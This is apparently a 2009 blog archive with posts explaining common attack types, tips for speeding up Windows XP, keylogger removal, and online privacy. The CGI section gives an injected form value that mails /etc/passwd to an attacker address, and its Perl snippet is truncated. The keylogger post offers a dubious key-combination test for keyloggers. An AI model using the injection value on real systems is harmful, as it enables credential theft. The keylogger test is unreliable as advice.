Sunday, October 25, 2009

Attack Types and Vulnerabilities

Introduction

There exist numerous ways to attack a target system. It could be achieved by exploiting known vulnerabilities in software or taking advantage of a badly configured security policy; it could be implemented remotely or internally. The techniques and methods used are likely to vary depending on the target and they should be chosen appropriately having assessed the situation fully. The attack types and vulnerabilities discussed in this module are:

1. Buffer Overflow attacks.

2. Denial of Service (DoS) attacks.

3. Distributed Denial of Service (DDoS) attacks.

4. Misconfigurations.

5. Abuse of Trust.

6. Brute force attacks.

7. CGI and WWW services.

8. Back doors and Trojans.


1. Buffer Overflow Attacks

These attacks exploit poorly written software to allow attackers to execute arbitrary code on the target system. Overflows can occur in server software which is available to users over the network, or in programs which exist on multi-user operating systems. In either case, a successful overflow will allow the attacker to execute arbitrary code with the privilege of the vulnerable service. The most sought after exploits in the hacker community are “remote root” exploits; however, they are not as common as the local exploits. A local exploit occurs in a service that is not available over the network, but is shared by users in a multi-user operating system such as UNIX. This allows for the same escalation of privilege as that provided by the remote exploits.

Example

If the sendmail daemon is running with root privileges and contains a buffer overflow, then commands executed via the overflow will provide the attacker with a means of executing commands as root.


2. Denial of Service (DoS) Attacks

Denial of Service or DoS attacks result in a specific service being made unavailable to legitimate users. These attacks typically have one of three targets:

• The network connection providing access to the service.

• The operating system hosting the service.

• The application level program providing the service.

The Network Connection Providing Access to the Service

By flooding the network with traffic, less bandwidth is available for use by the service. If enough bandwidth is consumed in this flood, access to the service could effectively deny service to legitimate users.

Example

A typical example of this is the Smurf attack, where data is sent to the broadcast address of a network, and the source address of the traffic is specified as that of the target machine. This results in all the systems on the network responding to the supposed source at the same time, thereby generating huge amounts of traffic.

The Operating System Hosting the Service

Operating systems have been found to be vulnerable to denial of service attacks. In the case of network based attacks this is caused by the operating system's specific implementation of the networking stack. A bug in this stack can cause the entire operating system to hang or reboot when anomalous network traffic is encountered.

Example

A well known example is the Windows NT Out of Bound attack (OOB), which caused affected systems to produce the “blue screen of death” when sent specific IP packets. We can expect to see more vulnerable IP stacks appearing as the market focus shifts to embedded Internet enabled devices, where each vendor is using their own implementation of the IP stack.

The Application Level Program Providing the Service

Network applications can be vulnerable to denial of service attacks in the same way that operating systems are. If no allowances are made for unexpected traffic or other input, the application could encounter a condition where it hangs, and can no longer provide the service it was designed for. Poor error handling in the code could lead to the same result. If the operating system does not take adequate precautions for extreme conditions, it could be vulnerable to an attack that attempts to exhaust the physical resources available on the system. Several such attacks have been released which push the CPU to 100 percent utilization, and thereby deny access to other services.


3. Distributed Denial of Service (DDoS) Attacks

Otherwise known as DDoS, these attacks have the same goal as standard Denial of Service attacks but use a different architecture in achieving it. A single host launching a network or application level attack against a target is constrained by it's own available network bandwidth and system resources, a group of machines can be more effective in a concerted attack. The current DDoS programs publicly available all use the same basic architecture to control the attack, common examples being:

• Stacheldraht.

• TFN.

• TFN2K.

• Trinoo.

Installing DDoS Software

There is a relatively standard procedure that is followed when installing the DDoS software in preparation for an attack.

1. Previously compromised hosts have “zombie” agents installed on them.

2. Another compromised host has the master controlling software installed on it. This piece of software is configured to be aware of the location of all the agents.

3. The last step is to install client software on the attacker's machine, used to initiate the attack.

Initiating the Attack

The attack is typically initiated in the following manner:

1. The client communicates the IP addresses of the desired targets to the master system.

2. This master system then instructs each of the agents to launch an attack against the target using standard DoS techniques. Early detection of these systems was possible by scanning machines for the presence of agents and by sniffing network traffic to detect the communication between the master and the agents.

Evolution of DDoS

As the DDoS tools have evolved they now incorporate encryption as part of the master to agent communication and allow agents to listen UDP ports, which only respond when sent a shared secret key. These two enhancements make detecting these systems remotely, a very difficult task.


4. Misconfigurations

Although exploits feature heavily in security related news, far more successful attacks are conducted by abusing common misconfigurations in network services. Network services should always be configured with a “deny access by default” policy. The opposite is often the case, which results in a number of services being vulnerable to malicious attack. Access controls on network services often lead to further privilege escalation and eventual compromise of the system. This was illustrated by the recent successful attack on the Apache web site. The attackers exploited a poorly configured ftp server, which allowed write access to the web site. This in turn allowed them to run a script, via the web and gain remote root access to the system. By default, certain products, such as Checkpoint's Firewall-1, are installed with settings that open them up to security vulnerabilities and have to be specifically reconfigured to ensure their secure operation.


5. Abuse of Trust

Early networking protocols did not place a lot of emphasis on encryption and authentication, as they were used in relatively small networks. As these networks and systems formed part of the Internet, it became possible to exploit weaknesses in these protocols. An example is the use of a source IP address as the means of establishing a trust relationship between two systems. Common attacks exploit this weakness by spoofing the address of the trusted host and thereby gain access to the trusting system and its resources. Typical examples are NFS and the “r” utilities (rsh, rlogin).


6. Brute Force Attacks

These attacks are aimed at gaining access to a system by repeated attempts at authentication. Most services that require a username and password, and have no facility for account lockout, are vulnerable to this type of attack. Brute force methods are commonly used to crack password files, as this can be done reasonably quickly on a local system. Common tools used in this case are:

• Crack - A UNIX based program.

• L0phtcrack - A Windows based program.

Attacking network based services can be more time consuming as the response time will depend heavily on the network load. Tools exist to crack the following services:

• Telnet.

• ftp.

• Http.

• CGI logins.

To improve the chances of a successful brute force attack, one part of a two part authentication is needed. This can be obtained from other network or system vulnerabilities, e.g. finger or null sessions, or by “dumpster diving” and other social engineering methods.

Dictionary Attack

Once a username has been established, it is expedient to first try a dictionary based attack which tries words from various dictionaries until a match is found. The dictionaries available vary in size and scope as well as subject. There are specific themes dictionaries available such as Star Wars dictionaries that can be used in conjunction with other information to produce a more targeted attack. Failing a dictionary attack, a true brute force method can be followed, which attempts every combination of characters from a known subset until a match is found. This can be very time consuming if this subset is large or if the minimum password length is relatively long.


7. CGI and WWW Services

As more websites offer interactive services, more CGI and web based vulnerabilities are being uncovered. CGI vulnerabilities fall into three categories:

• Buffer overflow.

• Command execution.

• Subverting client side scripting.

Buffer Overflow

Standard buffer overflow techniques can be applied to CGI scripts. Since scripts allow for user input, this input could be used to overflow buffers in vulnerable programs. This only affects scripts written in relatively low level languages such as C. Scripts should always perform validation on all user input and internal functions should do sanity checking on the size of buffers. Higher level, and more commonly used scripting languages perform bounds checking on variable and array lengths internally and will consequently not be vulnerable to buffer overflow attack. Examples of such languages are:

• Java.

• Perl.

• Python.

Command Execution

Scripts written in higher level languages sometimes contain more insidious vulnerabilities than their low level cousins. A common occurrence of this is command execution on the remote machine. This is once again caused by poor input validation. For example, CGI scripts sometimes contain code that executes shell commands such as the Perl command:

System("mail $email <>

Which is a simple way of mailing a document to a user. In this example the $email variable will contain an email address that was entered in a form on the website. If no input validation is done when the user enters her email address, it will be possible to imbed shell commands into the input field and have them executed by the system call.

hacker@hack.net < /etc/passwd;

Inserting the above value will cause the password file to be mailed to the attacker. As with buffer overflow attacks the level of privilege with which these commands are executed are dependent on the privilege level of the CGI script.

Subverting Client Side Scripting

Client side scripting in the form of Java script or VB script is sometimes used to perform input validation. This has the feature that the user is immediately notified when incorrect data is entered, and doesn’t have to wait for the form to be submitted before receiving feedback. Input validation done at this level presents serious security flaws, as the client side source code is available and editable by the end user. By simply removing the restriction on character sets and input length, buffer overflow and command execution attacks can then be attempted. Client side input validation should always be used as an added feature to server side validation and should not be considered a replacement. Very poorly written client side scripts sometimes contain usernames and passwords which can be used to gain access to the system.


8. Backdoors and Trojans

Trojans and backdoor programs are becoming an increasingly popular method for gaining unauthorized access to remote systems. Backdoors offer the attacker an easy way of accessing a remote system, without having to rely on exploits or other security vulnerabilities. The simplest backdoors take the form of command shells listening on unusual ports. A commonly used tool is NetCat, which is available on both the Windows and UNIX platforms. Once NetCat is installed and listening on port XXXX, the attacker need only telnet to port XXXX and be presented with a remote command shell.

Backdoor and Trojan Development

As intrusion detection and Firewalling technologies have improved, so have the backdoor programs. The simple TCP based remote shell utilities have been superseded by UDP and ICMP based programs that support encrypted data channels. The ability to control these backdoors with UDP packets allows them to be deployed behind firewalls that allow UDP traffic, typically for DNS on port 53. Similarly, if the Firewall in question allows ICMP packets through, these can be used to communicate with the backdoor programs. The use of encrypted data channels means that intrusion detection software can no longer inspect the packet data for signatures, making detection of these backdoors even more difficult.

Deployment

Backdoors can also be deployed on “virgin” systems without having to first compromise them through other means. This can be accomplished by imbedding the backdoor in an email attachment, ActiveX control or a file on the internet. Utilities such as Silkrope and Saranwrap exist, which allow the attacker to attach the Trojan to a seemingly legitimate file. Well known backdoor programs on the Microsoft Windows platform, include:

• BackOrifice.

• NetBus.

Sunday, August 23, 2009

23 Ways To Speed Windows XP, Not only Disk Defragmenter

Since Disk Defragmenter won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.

1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.


Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Tuesday, May 5, 2009

How to check and remove Keyloggers in your computer

What is Keylogger?
A keylogger is something records keystrokes made on a computer. All recorded key pressed on the keyboard are stored in a file and sent to e-mail of the person performing the monitoring. This means the person monitoring that keylogger will know each and everything you are doing in your computer also he will have your logins and passwords.

A keylogger can be software which can infect your system same as Spyware or Trojan, whereby it can be attached on the mail or software you download. Also keylogger can be a hardware whereby it will be connected between your keyboard connector and keyboard port on your computer.

What is a keylogger used for?
A keylogger has many uses. The keylogger silently records all keystrokes typed, including emails, word documents, chat-room activity, IRC, instant messages, web addresses and web searching.


Many companies use keyloggers on their company PCs to supervise employees for Internet and PC usage compliance. Keyloggers can help keep track of activity and allow a company to act on unauthorised activity before it becomes too late. But hackers are using keyloggers to capture targeted person activities and get information like bank account details, e-mail passwords, and system logins and passwords.

How to remove Keylogger?
You can try one of the below methods to check if there is a Keylogger in your computer;
1. Ctrl+Alt+Shift+different keys on the keyboard
2. Ctrl+Alt+Del+different keys on the keyboard.
If a pop-up appear and request for password, it means you have keylogger is your computer.

Recommended tools to remove Keyloggers
PSMAntiKeyLogger - PSMAntiKeyLogger is a real-time protecting software which protects you against Keyloggers. No scanning is needed.

SnoopFree - Freeware anti-keylogger that block hook based keyloggers as well as screen captures. For Windows XP.

I Hate Keyloggers - Freeware anti-keylogger that block hook based keyloggers. For Windows 2000 and XP.

KL-Detector - Freeware on demand keylogger scanner.

There are so many tools for the same, you can just search from www.google.com by using keywords like “Keylogger remover”, “how to remove keylogger”.

Friday, May 1, 2009

3. How to Protect Your Privacy When Using the Internet

Privacy is the ability to control when, how, and to whom your personal information is given. Privacy is power. Losing your privacy means losing personal power. This section offers tips and technical advice to help you protect your privacy when using the Internet. It applies whether you use Windows or some other operating system, like Linux or Apple's Mac OS. Web privacy is a fast-moving area in which technologies and laws are in flux. This guide can no more guarantee you absolute privacy than it can guarantee you a completely secure Windows. But if you follow our tips you'll minimize your privacy exposure.

3.1 Limit the Personal Information You Give Out

Before entering personal information into a web site form, a social network, or a forum, read the site's Privacy Policy and Terms of Use. If they're legalistic and hard-to-read, chances are they have more to do with harvesting your personal data than protecting it. Many agreements are written so that they can be changed at any time. This makes any assurance of protection for your personal data worthless because the web site could simply change the agreement after you've provided the information. Some agreements even include fine print by which you agree to the installation of malware on your computer!

Few privacy policies guarantee that information will be destroyed as it ages. Once given out, information tends to live forever. Few privacy policies give you any legal rights if your information is lost or stolen. In 2007 alone, over 162 million personal records were reported lost or stolen in the United States. (Yet it remains legal for companies to buy and sell your social security number and personal data.)

Once you post personal information on the web, you lose control over how that information is used. Changes to the "context" in which that data is used can harm you. An example is the information students enter into social web sites like MySpace or Facebook for their friends' amusement, only to find it resurfacing later to harm their employment opportunities or their careers. Both sites offer privacy controls that easily allow individuals to avoid such consequences -- but most users don't apply them.

The selling of personal data is a multibillion dollar, largely-unregulated business in the United States. It's an entire industry called information brokering.

People who give out their personal data expose themselves to manipulation or worse. Even the U.S. government is researching the harvesting of personal data from social networking sites for public surveillance. And why not? People voluntarily post the information. Fans of social networking will consider these cautions anachronistic. Please read how people expose themselves to manipulation or harm by posting personal data, found in authoritative books such as The The Digital Person, The Soft Cage, or The Future of Reputation: Gossip, Rumor, and Privacy on the Internet.

We need government regulation to enforce minimal rights for social network users, much the way we have consumer-protection legislation for credit cards. Meanwhile, protect yourself by educating yourself. Tiny bits of information can be collected and compiled by web computers into comprehensive profiles. If an organization can collect enough small bits of information --for example, just the names of all the web sites you visit -- they can eventually develop a complete picture of who you are, what you do, how you live, and what you believe. Privacy is power. You give away your personal power when you give out personal information. You assume risk you can not measure at the time you assume it.

3.2 Don't Let Web Sites Track You

Cookies are small files that web sites store on your computer's disk. They allow web sites to store information about your interaction with them. For example, they might store the data required for you to purchase items across the several web pages this involves. However, cookies --originally called tracking cookies --can also be used to track your movement across the web. Depending on the software using them, this data could be used to create a detailed record of your behavior as you surf. The resulting profile might be used for innocuous purposes, such as targeted marketing, or for malicious reasons, like spying.

Most browsers accept cookies by default. To retain your privacy, set the browser not to accept any cookies other than exceptions you specify. Then only web sites you approve can set cookies on your computer. A few web sites won't let you interact with them unless you accept their cookies -- but most will. You can also set most browsers to automatically delete all cookies when you exit. This allows web sites to set the cookies required for transactions like purchasing through the web but prevents tracking you across sessions. To manage cookie settings in your browser, access these panels:

To turn cookies on or off --
Internet Explorer


Tools | Internet Options | Privacy | Advanced
Firefox


(version 2 on) Tools | Options | Privacy | Cookies
Opera


Tools | Quick Preferences | Enable Cookies
K-Meleon


Tools | Privacy | Block Cookies
SeaMonkey


Edit | Preferences | Privacy & Security | Cookies
To allow specific web sites to set cookies --
Internet Explorer


Tools | Internet Options | Privacy | Edit
Firefox


Tools | Options | Privacy | Cookies | Exceptions
Opera


Tools | Preferences | Advanced | Cookies | Manage cookies
K-Meleon


Edit | Preferences | Privacy
SeaMonkey


Tools | Cookie Manager
To "clear" (erase) all cookies currently on your computer for the specified browser --
Internet Explorer


Tools | Internet Options | General | Delete Cookies
Firefox


Tools | Clear Private Data
Opera


Tools | Preferences | Advanced | Cookies
K-Meleon


Tools | Privacy | Clear Cookies
SeaMonkey


Tools | Cookie Manager | Manage Stored Cookies | Remove All Cookies
To automatically clear all cookies whenever you exit the browser --
Internet Explorer


Not available
Firefox


Tools | Options | Privacy | Cookies | Settings. . .
Opera


Tools | Preferences | Advanced | Cookies
K-Meleon


Tools | Privacy | Settings. . .
SeaMonkey


Not available

CookieCentral has more information about cookies and how to manage them. Other tracking mechanisms include web bugs, Flash cookies, third-party local shared objects. These are less common than cookies and rather technical so follow the links and see the Appendix if they concern you.

3.3 Email Privacy

Sending an email over the Internet is like sending a postcard through the mail. Anyone with the ability to intercept it can read it. There is evidence that the United States government either scans or compiles data about every email sent in the country.

You can keep the contents of your personal communications private by encrypting your email. This web page provides information and free downloads. It also lists programs that will encrypt your online interactive Chat. This article illustrates how to set up secure email step by step. The trouble with encrypted email is that both the sender and the recipient must participate. It's impractical to send encrypted email to people you don't know. Or to anyone using a different encryption system. The major email programs could easily support standardized, universally-compatible encryption in their clients -- but don't.

Remember that emails are often the basis for phishing scams --attempts to get you to reveal your personal information for nefarious purposes. Don't respond to email that may not be from a legitimate source. Don't even open it. Examples include claims you've won the lottery, pleas for help in handling large sums of money, sales pitches for outrageous deals, and the like.

Email may also be spoofed --masquerading as from a legitimate source when it is not. Examples are emails that ask you to click on a link to update your credit card account or those that ask for account information or passwords.

Legitimate businesses are well aware of criminal misuse of email and don't conduct serious business transactions through mass emailings!

Many people use two email addresses to avoid spam and retain their privacy. They use one account as a "junk" email address for filling out web site forms, joining forums, and the like. This email address doesn't disclose the person's identity and it collects the spam. They reserve a second email account for personal communications. They never give this one out except to personal friends, so it remains spam-free.

3.4 Web Surfing Privacy

If you tested your computer as suggested earlier using ShieldsUp!, you saw that it gives out information to every web site you visit. This data includes your Internet protocol address, operating system, browser version, and more. Your Internet protocol address or IP address is a unique identifier assigned to your computer when you access the Internet. Web sites can use it to track you. Your Internet Service Provider or ISP assigns your computer its IP address using one of several different techniques. How traceable you are on the web varies according to the technique your ISP employs along with several other factors, such as whether you allow web sites to set cookies and whether your computer is compromised by malware.

One way to mask who you are when web surfing is to change your IP address. Anonymizing services hide your IP address and location from the web sites you visit by stripping it out as your data passes through them on the way to your destination web site. Anonymizers help hide your identity and prevent web sites from tracking you but they are not a perfect privacy solution (because the anonymizer itself could be compromised). Anonymizer.com is a very popular free anonymizing service. Find other free services here and here.

A more robust approach to anonymity is offered by free software from JAP and TOR. Both route your data through intermediary servers called proxies so that the destination web site can't identify you. Your data is encrypted in transit, so it can not be intercepted or read by anyone who scans passing data. Services like JAP and TOR present two downsides. First, your data is sent through intermediary computers on the way to its destination, so response time slows. Whether you still find it acceptable depends on many factors; the best way to find out is simply to try the software for yourself.

These systems still leave you exposed to privacy violations by your Internet Service Provider. Your ISP is the your computer's entry point into the Internet, so your ISP can track all your actions online. For this reason, when the Bush administration decided to monitor American citizens through the Internet, they proposed legislation that would force all ISPs to keep two years of data about all their customers' activities. The government's current web surveillance program made it necessary for major ISPs like AT&T/Yahoo to change its privacy policy in June 2006 to say that AT&T --not its customers --owns all the customers' Internet records and can use them however it likes. Repeated congressional proposals to immunize ISPs from all legal challenges only make sense if the ISPs colluded with the government in illegally monitoring Internet activities.

3.5 Search Privacy

Web sites that help you search the web are called search engines. Popular search engines like Google, Yahoo!, and MSN Search retain records of all your web searches. Individually, the keywords you type into search engines show little. But aggregated, they may expose your identity. They may also expose your innermost thoughts --or be misinterpreted as doing so. Here's an example. Say the search engine captures you entering this list of searches --

  • kill wife
  • how to kill wife
  • killing with untraceable substance
  • kill with unknown substance
Someone might interpret these searches as indicating that you should be reported to the authorities because you're planning a murder. But what if you were simply doing research for that murder mystery you always wanted to write? You can see need for search privacy. Do you have it? The federal government has demanded search records from major search engines like Google, AOL, Yahoo, and MSN.

While the government claims these requests are to combat sexual predators, most analysts believe they are for public surveillance and data mining. America Online (AOL) accidentally posted online 20 million personal queries from over 650,000 users. The data was immediately gobbled up and saved in other web servers. Although AOL apologized and quickly took down their posting, this data will probably remain available forever somewhere. Some people can be identified by their "anonymous" searches and have been harmed as a result of this violation of their privacy.

The AOL incident is a wake-up call to those who don't understand how small pieces of information about people can be collected by Internet servers, then compiled into revealing dossiers about our individual behaviors. This principle doesn't just apply to search engines. It extends to the web sites you visit, the books you buy online, the comments you enter into forums, the political web sites you read, and all your other web activities. The AOL debacle demonstrates that web activities many assume to be anonymous can sometimes be traceable to specific individuals.

The Electronic Frontier Foundation's excellent white paper Six Tips to Protect Your Search Privacy offers these recommendations to ensure your search privacy --

  • Don't include words in your searches that identify you personally (such as your name or social security number)
  • Don't use your ISP's search engine (since they know who you are)
  • Don't "log in" to search engine web sites
  • Don't let the search engine set cookies
  • Don't use the same IP address all the time
  • Use anonymizers like JAP or TOR to thwart traceability